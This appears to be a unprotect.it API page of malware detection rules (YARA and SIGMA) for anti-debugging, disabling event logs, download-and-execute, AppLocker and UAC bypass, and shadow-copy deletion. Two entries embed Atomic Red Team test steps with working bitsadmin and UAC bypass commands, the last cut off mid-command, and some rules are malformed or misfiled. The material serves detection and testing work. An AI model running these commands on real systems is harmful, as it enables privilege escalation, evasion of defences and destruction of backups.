HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
{
"count": 159,
"next": "https://unprotect.it/api/detection_rules/?format=api&page=3",
"previous": "https://unprotect.it/api/detection_rules/?format=api",
"results": [
{
"id": 69,
"key": "detect_ollydbg_badformat_trick",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "Detect_OllyDbg_BadFormat_Trick",
"rule": "rule Detect_OllyDBG_BadFormatTrick: AntiDebug {\r\n meta: \r\n description = \"Detect bad format not handled by Ollydbg\"\r\n author = \"Unprotect\"\r\n comment = \"Experimental rule\"\r\n strings:\r\n $1 = \"%s%s.exe\" fullword ascii\r\n condition: \r\n $1\r\n}"
},
{
"id": 134,
"key": "hunting_rule_shikataganai",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "Hunting_Rule_ShikataGaNai",
"rule": "// Mandiant's Yara rule to detect \"some of the current common permutations created by vanilla x86-SGN in Metasploit\"\r\nrule Hunting_Rule_ShikataGaNai\r\n{\r\n meta:\r\n author = \"Steven Miller\"\r\n company = \"FireEye\"\r\n reference = \"https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html\"\r\n strings:\r\n $varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }\r\n $varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }\r\n $varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }\r\n $varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }\r\n $varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }\r\n $varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }\r\n $varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }\r\n $varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }\r\n $varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }\r\n $varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }\r\n $varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }\r\n $varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }\r\n condition:\r\n any of them\r\n}"
},
{
"id": 159,
"key": "impair-defenses-through-disable-windows-event-logging-was-detected",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "Impair Defenses Through Disable Windows Event Logging was Detected",
"rule": "title: Impair Defenses Through Disable Windows Event Logging was Detected\r\ndescription: Detects the Impair Defenses tatic, through disable windows event logging technique\r\ndate : 04/12/2024\r\nauthor: 0x0d4y\r\nreferences:\r\n- https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\n- https://attack.mitre.org/techniques/T1562/002/\r\ntags:\r\n- attack.defense.evasion\r\n- attack.T1562.002\r\n- malware.generic\r\nlogsource:\r\n category: process_creation, powershell_cmdlet, regitry_modification\r\n product: windows\r\ndetection:\r\n selection1:\r\n EventID:\r\n - '4688'\r\n - '1'\r\n NewProcessName:\r\n - 'sc.exe' \r\n CommandLine|contains:\r\n - '*eventlog start=disabled*'\r\n selection2:\r\n EventID:\r\n - '4688'\r\n - '1'\r\n NewProcessName:\r\n - 'auditpol.exe'\r\n CommandLine|contains:\r\n - '*/success:disable*'\r\n - '*/clear*'\r\n - '*/remove*'\r\n selection3:\r\n EventID:\r\n - '4688'\r\n - '1'\r\n NewProcessName:\r\n - 'wevtutil.exe'\r\n CommandLine|contains:\r\n - '*sl*'\r\n selection4:\r\n EventID:\r\n - '4688'\r\n - '1'\r\n NewProcessName:\r\n - 'reg.exe'\r\n CommandLine|contains:\r\n - '*add*SOFTWARE\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\*REG_DWORD /d 0*'\r\n selection5:\r\n EventID:\r\n - '13'\r\n - '4657'\r\n TargetRegistry|contains:\r\n - '*SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\*'\r\n Details:\r\n - 0\r\n - 0x00000000\r\n selection6:\r\n EventID:\r\n - '4104'\r\n Message|contains:\r\n - '*Set-Service -Name EventLog -Status Stopped*'\r\n condition: selection1 or selection2 or selection3 or selection4 or selection5 or selection6\r\nlevel: critical"
},
{
"id": 18,
"key": "sigma_anti_vm",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_ANTI_VM",
"rule": "title: AntiVM\r\nstatus: experimental\r\ndescription: Detect virtual environment \"VirtualBox|VMware|KVM|HVM\" \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200020\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack: T1497\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*IlZpcnR1YWxCb3h8Vk13YXJlfEtWTXxIVk0i*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 119,
"key": "sigma_hook_injection",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_Hook_Injection",
"rule": "title: Hook Injection Detection\r\ndescription: Detects instances of hook injection in Windows\r\nauthor: Unprotect\r\nreferences:\r\n- https://en.wikipedia.org/wiki/Hooking\r\n- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowhookexe\r\n- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-unhookwindowshookex\r\n- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callnexthookex\r\ntags:\r\n- attack.persistence\r\n- attack.t1179\r\n- malware.generic\r\n\r\n# Check for the presence of the SetWindowsHookEx function, which is often used to install hooks\r\n- 'SetWindowsHookExA'\r\n- 'SetWindowsHookExW'\r\n\r\n# Check for the presence of the UnhookWindowsHookEx function, which is often used to remove hooks\r\n- 'UnhookWindowsHookEx'\r\n\r\n# Check for the presence of the CallNextHookEx function, which is often used in hook functions\r\n- 'CallNextHookEx'\r\nThis rule uses string matching to look for the presence of specific functions that are commonly used in hook injection. If any of these functions are found in a scanned file, the rule will match and the code will be detected as potentially using hook injection. As with the YARA rule, this is just an example and more advanced rules may be needed for more robust detection."
},
{
"id": 52,
"key": "sigma_base64_download",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_base64_download",
"rule": "title: Powershell download file from base64 url\r\nstatus: experimental\r\ndescription: Powershell download file from base64 url\r\nauthor: Joe Security\r\ndate: 2020-04-13\r\nid: 200072\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection:\r\n CommandLine:\r\n - '*.downloadfile([system.text.encoding]::ascii.getstring([system.convert]::frombase64string(*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 61,
"key": "sigma_bitsadmin",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_bitsadmin",
"rule": "title: bitsadmin download and execute\r\nstatus: experimental\r\ndescription: Detect bitsadmin download and execute activity\r\nauthor: Joe Security\r\ndate: 2019-11-25\r\nid: 200031\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*bitsadmin /transfer*http*start %APPDATA%*'\r\n - '*/transfer*http*.dll&& rundll32*'\r\n - '*powershell*start-bitstransfer*start-process*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 55,
"key": "sigma_bypass_applocker",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_bypass_applocker",
"rule": "title: AppLocker Bypass via Regsvr32\r\nstatus: experimental\r\ndescription: AppLocker Bypass via Regsvr32\r\nauthor: Joe Security\r\ndate: 2020-03-04\r\nid: 200059\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*regsvr32*/s /u /n /i:http*scrobj*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 9,
"key": "sigma_check_external_ip",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_check_external_ip",
"rule": "title: Check external IP via Powershell\r\nstatus: experimental\r\ndescription: Check external IP via Powershell\r\nauthor: Joe Security\r\ndate: 2020-07-20\r\nid: 200081\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 6\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*powershell*api.ipify.org*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 43,
"key": "sigma_decode_string_findstr",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_decode_string_findstr",
"rule": "title: Decode strings from lnk via findstr.exe\r\nstatus: experimental\r\ndescription: uses findstr.exe to decode strings from lnk file\r\nauthor: Joe Security\r\ndate: 2019-11-11\r\nid: 200024\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*findstr /b /i *.lnk*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 33,
"key": "sigma_delete_shadow_copy",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_delete_shadow_copy",
"rule": "title: Delete Shadow Copy Via Powershell\r\nstatus: experimental\r\ndescription: Delete Shadow Copy Via Powershell\r\nauthor: Joe Security\r\ndate: 2019-10-25\r\nid: 200011\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack: T1490\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*powershell*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 54,
"key": "sigma_detect_region",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_detect_region",
"rule": "title: Geofenced Ru\r\nstatus: experimental\r\ndescription: Detect region and exit if matched with harcoded country list Get-UICulture).Name -match \"CN|RO|RU|UA|BY \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200019\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 8\r\nmitreattack: T1241\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*R2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZI*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 51,
"key": "sigma_hide_copy_melt",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_hide_copy_melt",
"rule": "title: Hide copy and delete itself\r\nstatus: experimental\r\ndescription: Hide copy via attrib.exe and delete itself\r\nauthor: Joe Security\r\ndate: 2019-11-12\r\nid: 200025\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*attrib +s +h *timeout /t *del /f /q*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 59,
"key": "sigma_hide_in_appdata",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_hide_in_appdata",
"rule": "title: Copy itself to suspicious location via type command \r\nstatus: experimental\r\ndescription: Copy itself to suspicious location via type command\r\nauthor: Joe Security\r\ndate: 2020-02-13\r\nid: 200052\r\nthreatname:\r\nbehaviorgroup: 10\r\nclassification: 1\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*cmd*type*>*\\AppData*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 36,
"key": "sigma_kill_process",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_kill_process",
"rule": "title: Kill multiple process\r\nstatus: experimental\r\ndescription: Kill multiple process\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200039\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*cmd*taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 29,
"key": "sigma_lolbins",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_lolbins",
"rule": "attack_technique: T1197\r\ndisplay_name: BITS Jobs\r\natomic_tests:\r\n- name: Bitsadmin Download (cmd)\r\n auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421\r\n description: |\r\n This test simulates an adversary leveraging bitsadmin.exe to download\r\n and execute a payload\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n remote_file:\r\n description: Remote file to download\r\n type: url\r\n default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n local_file:\r\n description: Local file path to save downloaded file\r\n type: path\r\n default: '%temp%\\bitsadmin1_flag.ps1'\r\n executor:\r\n command: |\r\n bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}\r\n cleanup_command: |\r\n del #{local_file} >nul 2>&1\r\n name: command_prompt\r\n- name: Bitsadmin Download (PowerShell)\r\n auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc\r\n description: |\r\n This test simulates an adversary leveraging bitsadmin.exe to download\r\n and execute a payload leveraging PowerShell\r\n\r\n Upon execution you will find a github markdown file downloaded to the Temp directory\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n remote_file:\r\n description: Remote file to download\r\n type: url\r\n default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n local_file:\r\n description: Local file path to save downloaded file\r\n type: path\r\n default: $env:TEMP\\bitsadmin2_flag.ps1\r\n executor:\r\n command: |\r\n Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}\r\n cleanup_command: |\r\n Remove-Item #{local_file} -ErrorAction Ignore\r\n name: powershell\r\n- name: Persist, Download, & Execute\r\n auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae\r\n description: |\r\n This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.\r\n Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.\r\n This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of \"svchost.exe\" and an Initiating Process Command Line of \"svchost.exe -k netsvcs -p -s BITS\"\r\n This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n command_path:\r\n description: Path of command to execute\r\n type: path\r\n default: C:\\Windows\\system32\\notepad.exe\r\n bits_job_name:\r\n description: Name of BITS job\r\n type: string\r\n default: AtomicBITS\r\n local_file:\r\n description: Local file path to save downloaded file\r\n type: path\r\n default: '%temp%\\bitsadmin3_flag.ps1'\r\n remote_file:\r\n description: Remote file to download\r\n type: url\r\n default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n executor:\r\n command: |\r\n bitsadmin.exe /create #{bits_job_name}\r\n bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}\r\n bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} \"\"\r\n bitsadmin.exe /resume #{bits_job_name}\r\n timeout 5\r\n bitsadmin.exe /complete #{bits_job_name}\r\n cleanup_command: |\r\n del #{local_file} >nul 2>&1\r\n name: command_prompt\r\n- name: Bits download using destktopimgdownldr.exe (cmd)\r\n auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114\r\n description: |\r\n This test simulates using destopimgdwnldr.exe to download a malicious file\r\n instead of a desktop or lockscreen background img. The process that actually makes \r\n the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) \r\n and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n remote_file:\r\n description: Remote file to download\r\n type: url\r\n default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n download_path:\r\n description: Local file path to save downloaded file\r\n type: path\r\n default: 'SYSTEMROOT=C:\\Windows\\Temp'\r\n cleanup_path:\r\n description: path to delete file as part of cleanup_command\r\n type: path\r\n default: C:\\Windows\\Temp\\Personalization\\LockScreenImage\r\n cleanup_file:\r\n description: file to remove as part of cleanup_command\r\n type: string\r\n default: \"*.md\"\r\n executor:\r\n command: |\r\n set \"#{download_path}\" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr\r\n cleanup_command: |\r\n del #{cleanup_path}\\#{cleanup_file} >null 2>&1\r\n name: command_prompt"
},
{
"id": 44,
"key": "sigma_onset_delay",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_onset_delay",
"rule": "title: Powershell delayed execution via ping command\r\nstatus: experimental\r\ndescription: Powershell delayed execution via ping command\r\nauthor: Joe Security\r\ndate: 2020-03-17\r\nid: 200066\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*ping -n * & powershell.exe -executionpolicy bypass -noninteractive -windowstyle hidden*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 34,
"key": "sigma_posh_pc_delete_volume_shadow_copies",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_posh_pc_delete_volume_shadow_copies",
"rule": "title: Delete Volume Shadow Copies Via WMI With PowerShell\r\nid: 87df9ee1-5416-453a-8a08-e8d4a51e9ce1\r\ndescription: Shadow Copies deletion using operating systems utilities via PowerShell\r\nreferences:\r\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md\r\n - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_shadow_copies_deletion.yml\r\n - https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\ntags:\r\n - attack.impact\r\n - attack.t1490\r\nstatus: experimental\r\nauthor: frack113\r\ndate: 2021/06/03\r\nmodified: 2021/10/16\r\nlogsource:\r\n product: windows\r\n category: ps_classic_start\r\n definition: fields have to be extract from event\r\ndetection:\r\n selection_obj:\r\n HostApplication|contains|all:\r\n - 'Get-WmiObject'\r\n - ' Win32_Shadowcopy'\r\n selection_del:\r\n HostApplication|contains:\r\n - 'Delete()'\r\n - 'Remove-WmiObject'\r\n condition: selection_obj and selection_del\r\nfields:\r\n - HostApplication\r\nfalsepositives:\r\n - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
},
{
"id": 37,
"key": "sigma_proc_creation_win_shadow_copies_deletion",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_proc_creation_win_shadow_copies_deletion",
"rule": "title: Shadow Copies Deletion Using Operating Systems Utilities\r\nid: c947b146-0abc-4c87-9c64-b17e9d7274a2\r\nstatus: stable\r\ndescription: Shadow Copies deletion using operating systems utilities\r\nauthor: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)\r\ndate: 2019/10/22\r\nmodified: 2021/10/24\r\nreferences:\r\n - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\r\n - https://blog.talosintelligence.com/2017/05/wannacry.html\r\n - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\r\n - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\r\n - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\r\n - https://github.com/Neo23x0/Raccine#the-process\r\n - https://github.com/Neo23x0/Raccine/blob/main/yara/gen_ransomware_command_lines.yar\r\n - https://redcanary.com/blog/intelligence-insights-october-2021/\r\ntags:\r\n - attack.defense_evasion\r\n - attack.impact\r\n - attack.t1070\r\n - attack.t1490\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection1:\r\n Image|endswith:\r\n - '\\powershell.exe'\r\n - '\\wmic.exe'\r\n - '\\vssadmin.exe'\r\n - '\\diskshadow.exe'\r\n CommandLine|contains|all:\r\n - shadow # will match \"delete shadows\" and \"shadowcopy delete\" and \"shadowstorage\"\r\n - delete\r\n selection2:\r\n Image|endswith:\r\n - '\\wbadmin.exe'\r\n CommandLine|contains|all:\r\n - delete\r\n - catalog\r\n - quiet # will match -quiet or /quiet\r\n selection3:\r\n Image|endswith: '\\vssadmin.exe'\r\n CommandLine|contains|all:\r\n - resize\r\n - shadowstorage\r\n - unbounded\r\n condition: 1 of selection*\r\nfields:\r\n - CommandLine\r\n - ParentCommandLine\r\nfalsepositives:\r\n - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
},
{
"id": 40,
"key": "sigma_process_reimaging",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_process_reimaging",
"rule": "action: global\r\ntitle: Defense evasion via process reimaging\r\nid: 7fa4f550-850e-4117-b543-428c86ebb849\r\ndescription: Detects process reimaging defense evasion technique\r\nstatus: experimental\r\nauthor: Alexey Balandin, oscd.community\r\nreferences:\r\n - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/\r\ntags:\r\n - attack.defense_evasion\r\ndate: 2019/10/25\r\ndetection:\r\n condition: all of them\r\nfalsepositives:\r\n - unknown\r\nlevel: high\r\n---\r\nlogsource:\r\n product: windows\r\n service: sysmon\r\ndetection:\r\n selection1:\r\n category: process_creation\r\nfields:\r\n - Image\r\n - OriginalFileName\r\n - ParentProcessGuid\r\nnew_fields:\r\n - ImageFileName\r\n---\r\nlogsource:\r\n product: windows\r\n service: sysmon\r\ndetection:\r\n selection2:\r\n EventID: 11\r\nfields:\r\n - ProcessGuid\r\n - TargetFilename"
},
{
"id": 48,
"key": "sigma_spoofed_extension",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_spoofed_extension",
"rule": "title: Execute DLL with spoofed extension\r\nstatus: experimental\r\ndescription: Execute DLL with spoofed extension\r\nauthor: Joe Security\r\ndate: 2020-03-24\r\nid: 200068\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*rundll32*.html,DllRegisterServer*'\r\n - '*rundll32*.htm,DllRegisterServer*'\r\n - '*rundll32*.txt,DllRegisterServer*'\r\n - '*rundll32*.png,DllRegisterServer*'\r\n - '*rundll32*.jpeg,DllRegisterServer*'\r\n - '*rundll32*.jpg,DllRegisterServer*'\r\n - '*regsvr32 c:\\programdata\\\\*.pdf*'\r\n - '*regsvr32 c:\\programdata\\\\*.txt*'\r\n - '*regsvr32 c:\\users\\public\\\\*.pdf*'\r\n - '*regsvr32 c:\\users\\public\\\\*.txt*'\r\n \r\n condition: selection\r\nlevel: critical"
},
{
"id": 23,
"key": "sigma_stop_service",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_stop_service",
"rule": "title: Stop multiple services\r\nstatus: experimental\r\ndescription: Stop multiple services\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200040\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*cmd*net stop*& net stop*& net stop*& net stop*& net stop*& net stop*& net stop*'\r\n condition: selection\r\nlevel: critical"
},
{
"id": 24,
"key": "sigma_uac_bypass",
"type": {
"id": 3,
"name": "SIGMA",
"syntax_lang": "yaml"
},
"name": "SIGMA_uac_bypass",
"rule": "title: Fodhelper UAC Bypass\r\nstatus: experimental\r\ndescription: Fodhelper UAC Bypass\r\nauthor: Joe Security\r\ndate: 2020-07-30\r\nid: 200082\r\nthreatname:\r\nbehaviorgroup: 26\r\nclassification: 7\r\nmitreattack:\r\n\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection: \r\n CommandLine:\r\n - '*reg add*hkcu\\software\\classes\\ms-settings\\shell\\open\\command*'\r\n condition: selection\r\nlevel: critical\r\nattack_technique: T1548.002\r\ndisplay_name: 'Abuse Elevation Control Mechanism: Bypass User Access Control'\r\natomic_tests:\r\n- name: Bypass UAC using Event Viewer (cmd)\r\n auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9\r\n description: |\r\n Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n Upon execution command prompt should be launched with administrative privelages\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n executable_binary:\r\n description: Binary to execute with UAC Bypass\r\n type: path\r\n default: C:\\Windows\\System32\\cmd.exe\r\n executor:\r\n command: |\r\n reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n cmd.exe /c eventvwr.msc\r\n cleanup_command: |\r\n reg.exe delete hkcu\\software\\classes\\mscfile /f >nul 2>&1\r\n name: command_prompt\r\n- name: Bypass UAC using Event Viewer (PowerShell)\r\n auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b\r\n description: |\r\n PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n Upon execution command prompt should be launched with administrative privelages\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n executable_binary:\r\n description: Binary to execute with UAC Bypass\r\n type: path\r\n default: C:\\Windows\\System32\\cmd.exe\r\n executor:\r\n command: |\r\n New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\r\n 